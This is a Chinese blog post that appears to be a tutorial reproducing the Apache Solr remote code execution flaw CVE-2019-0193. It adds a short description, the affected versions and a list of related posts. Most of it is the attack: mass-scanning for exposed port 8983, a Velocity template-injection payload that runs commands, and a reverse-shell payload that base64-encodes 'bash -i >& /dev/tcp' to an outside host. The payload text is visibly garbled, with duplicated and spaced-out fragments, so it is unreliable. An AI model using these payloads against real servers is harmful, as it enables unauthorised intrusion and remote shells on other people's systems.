Apache Solr远程代码执行漏洞 (CVE-2019-0193)复现操作

最新推荐文章于 2024-08-02 20:00:00 发布
最新推荐文章于 2024-08-02 20:00:00 发布
阅读量164 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L18296069161/article/details/103575934
版权

渗透学习交流群:773617250,进群免费领取课程,群定定期直播,可与讲师进行互动。

一. 漏洞描述

2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞(CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于DIH配置可以包含脚本,因此该参数存在安全隐患。攻击者可利用dataConfig参数构造恶意请求,实现远程代码执行,请相关用户尽快升级Solr至安全版本,以确保对此漏洞的有效防护。

二. 复现操作

  1. 批量搜一下开了8983端口的主机
    在这里插入图片描述

  2. 访问目标主机,找到漏洞的位置,点到 core selector那个按钮,burp抓包拦截
    在这里插入图片描述
    在这里插入图片描述

  3. 发送到repeater,把上图请求的admin 改为item(这里注意对应的模块),后面再加config 查看是否有其配置文件,如果没有配置文件,则说明可能目标不存在这种漏洞,这也是一种检测方式?
    在这里插入图片描述

  4. 因为该漏洞所影响的模块可以利用外部的请求来修改,所以利用恶意的请求payload去修改配置,修改了配置过后,就导致可以执行恶意的脚本,从而发起带有恶意代码的请求。
    在这里插入图片描述

  5. 修改了配置过后,便可以带上恶意脚本的请求去发起访问了,从而导致了远程代码执行,请求路径内容如下图
    payloadselect?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set( x = x=%27%27)+%23set( x=rt= x . c l a s s . f o r N a m e ( x.class.forName(%27java.lang.Runtime%27))+%23set( x.class.forName(chr= x . c l a s s . f o r N a m e ( x.class.forName(%27java.lang.Character%27))+%23set( x.class.forName(str= x . c l a s s . f o r N a m e ( x.class.forName(%27java.lang.String%27))+%23set( x.class.forName(ex= r t . g e t R u n t i m e ( ) . e x e c ( rt.getRuntime().exec(%27pwd%27))+ rt.getRuntime().exec(ex.waitFor()+%23set( o u t = out= out=ex.getInputStream())+%23foreach( i + i n + [ 1.. i+in+[1.. i+in+[1..out.available()]) s t r . v a l u e O f ( str.valueOf( str.valueOf(chr.toChars($out.read()))%23end
    在这里插入图片描述

  6. 远程代码执行成功

  7. 反弹shell payload:
    linux 反弹shell命令 bash -i >& /dev/tcp/ip/port 0>&1 (至于payload中为什么要base64编码不太清楚…)
    http://ip 8983/solr/item/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set( x = x=%27%27)+%23set( x=rt= x . c l a s s . f o r N a m e ( x.class.forName(%27java.lang.Runtime%27))+%23set( x.class.forName(chr= x . c l a s s . f o r N a m e ( x.class.forName(%27java.lang.Character%27))+%23set( x.class.forName(str= x . c l a s s . f o r N a m e ( x.class.forName(%27java.lang.String%27))+%23set( x.class.forName(ex= r t . g e t R u n t i m e ( ) . e x e c ( rt.getRuntime().exec(%27bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMS4yMDMuMi4yMTgvMTIzNCAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27))+ rt.getRuntime().exec(ex.waitFor()+%23set( o u t = out= out=ex.getInputStream())+%23foreach( i + i n + [ 1.. i+in+[1.. i+in+[1..out.available()]) s t r . v a l u e O f ( str.valueOf( str.valueOf(chr.toChars($out.read()))%23end

三. 漏洞特征:

端口:8983,http
路径:/solr/item/config

四. 影响范围

受影响版本 :
Apache Solr < 8.2.0

                                                  BY易锦教育渗透讲师马丁
L18296069161
关注
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558)
qq_51577576的博客
12-09 589
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558) Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码
Apache Solr RCE (CVE-2020-13957)未授权上传漏洞 + Velocity模板远程执行CVE-2019-17558)复现
ximo的博客
04-28 527
漏洞概述 (CVE-2020-13957)未授权上传漏洞: 在特定的Solr版本中ConfigSet API存在未授权上传漏洞 ,配合CVE-2019-17558可执行任意命令。 (CVE-2019-17558)Velocity模板远程执行: 攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程执行命令。 配合CVE-2020-13957上传漏洞上传Core,进行攻击。 影响版本 CVE-2020-1395
Apache Solr 远程命令执行漏洞 CVE-2019-0193 漏洞复现
ADummy的博客
02-28 501
Apache Solr 远程命令执行漏洞CVE-2019-0193) by ADummy 0x00利用路线 ​ 创建核心—>选择debug模式—>写入exp—>命令执行 0x01漏洞介绍 ​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能
漏洞复现Apache solr
最新发布
weixin_68416970的博客
08-02 355
漏洞复现Apache solrApache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台
SolrCVE-2019-0193复现
weixin_30855099的博客
08-26 1036
漏洞原理:当solr开启了DataImportHandler功能,该模块中的DIH配置都可以通过外部请求dataconfig参数进行修改,DIH可包含脚本,因此,会存在远程代码执行漏洞 漏洞版本:Apache Solr<8.2.0 复现过程: 这里以solr 7.2.2版本为例:https://www.apache.org/dyn/closer.lua/lucene/solr...
Apache solr 远程代码执行漏洞CVE-2019-0193复现
weixin_42558965的博客
01-12 805
0x00:复现环境 靶机:CentOS7、docker、vulhub-master 攻击机:windows10 0x01:复现过程(数据包提交) 在/vulhub-master/solr/CVE-2019-0193/下启动镜像: docker-compose up -d 然后攻击机访问靶机IP:8983(默认端口号) 如图访问成功: 随后运行命令: docker-compose exec solr bash bin/solr create_core -c test -d example/example-
执行带out参数的存过_Apache Solr远程代码执行漏洞CVE-2019-0193复现操作
weixin_39998906的博客
11-12 94
QQ交流学习群:811401950一. 漏洞描述 2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于...
Apache Solr远程代码执行漏洞CVE-2019-0193
玄道的网安博客
06-25 1044
前言 Apache Solr官方发布Apache Solr存在一个远程代码执行漏洞CVE-2019-0193),攻击者可利用dataConfig参数构造恶意请求,导致执行任意代码 影响版本 Apache Solr < 8.2.0 环境搭建 切换到solr目录 cd vulhub/solr/CVE-2019-0193 docker-compose up -d docker-compose exec solr bash bin/solr create_core -c test -d
漏洞复现Apache Solr 远程命令执行漏洞CVE-2019-0193
Pluto.的博客
12-27 3606
文章目录Vulhub漏洞复现Apache Solr远程命令执行漏洞复现(CVE-2019-0193)一、漏洞概述二、漏洞复现1. 复现步骤2. 利用该漏洞getshell Vulhub漏洞复现 Apache Solr远程命令执行漏洞复现(CVE-2019-0193) 一、漏洞概述 Apache Solr搜索服务,它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引(solr 中索引库用 core
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以使用各种不同类型的数据源来构造 Exploit1使用数据源的类型为URLDataSource Exploit2使用的数据源类型为ContentStreamDataSource 检测突破-Exploit1 Exploit1使用数据源的类型为URLDataSource 优点:结果回显支持对Solr低版本的检测 缺点:需要出网 步骤1 构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!)可以直接使用这个 文档demo.xml即URLDataSource类型的数据源一份无害的正常XML文档 文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
vulhub中Apache Solr 远程命令执行漏洞复现CVE-2019-0193
yougexiaojiuguan的博客
04-04 941
漏洞复现过程的记录
Solr远程命令执行复现cve-2019-0193)
偷一个月亮
11-23 219
环境搭建 启动环境并创建集合 docker-compose up -d docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db 环境搭建完成 漏洞利用 查看模块名称 构造包开启params.resource.loader.enabled POST /solr...
Apache Solr远程命令执行漏洞复现CVE-2019-0193,docker 搭建)
suqiban7253的博客
03-14 276
这里写自定义目录标题0x00漏洞简介0x01 漏洞概述0x02影响范围0x03环境搭建0x04漏洞复现0x05 遇到的问题0x06参考 0x00漏洞简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 0x01 漏洞概述 该漏洞的产生是由于两方面的原因: 当攻击者可以直接访问Solr控制台时,可以通过发送类似/节
CVE-2019-0193漏洞复现Apache Solr 远程命令执行漏洞复现
m0_58687645的博客
12-23 1431
0X00漏洞简介 CVE-2019-0193是一个存在于Apache solr搜索引擎中的命令执行漏洞 0X01漏洞原因 Apache solr 是一款开源的搜索服务器并且使用java语言开发;主要的工作方式:用户通过http请求像搜索引擎发出索引条件,solr对条件进行分词 处理,根据分词结果查找索引,继而找到文档   在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患,在apache solr < 8.2.0版本之前DIH配置
Apache Solr CVE-2019-0193 环境搭建漏洞复现
星空下de青铜
05-27 359
docker pull scxiaotan2/apache-solr:cve-2019-0193 # 拉取镜像 docker run -it scxiaotan2/apache-solr:cve-2019-0193 /bin/bash #启动shell ./start.sh #启动根目录下的服务 netstat -tlnp #可以看到1983端口启用了
CVE-2019-0193Apache Solr远程命令执行漏洞复现
nex1less的博客
11-26 746
0x01 漏洞描述 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重 0x02 漏洞环境 1.服务器需要安装java环境: https://jingyan.baidu.com/article/375c8e190c1f9525f2a22931.html 2.服务器需要安装curl环境: (1)下载curl包:https...
Apache Solr 2020安全漏洞CVE-13957:未经授权的上传与RCE风险
"CVE-2020-13957 是一个针对Apache Solr的安全漏洞,它...3. 最后,通过发送一个查询请求到`http://ip:8983/solr/mytest2/select?q=1&wt=velocity&v.template=custom&v.template.custom`,并利用Velocity模板执行代码注入(CVE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值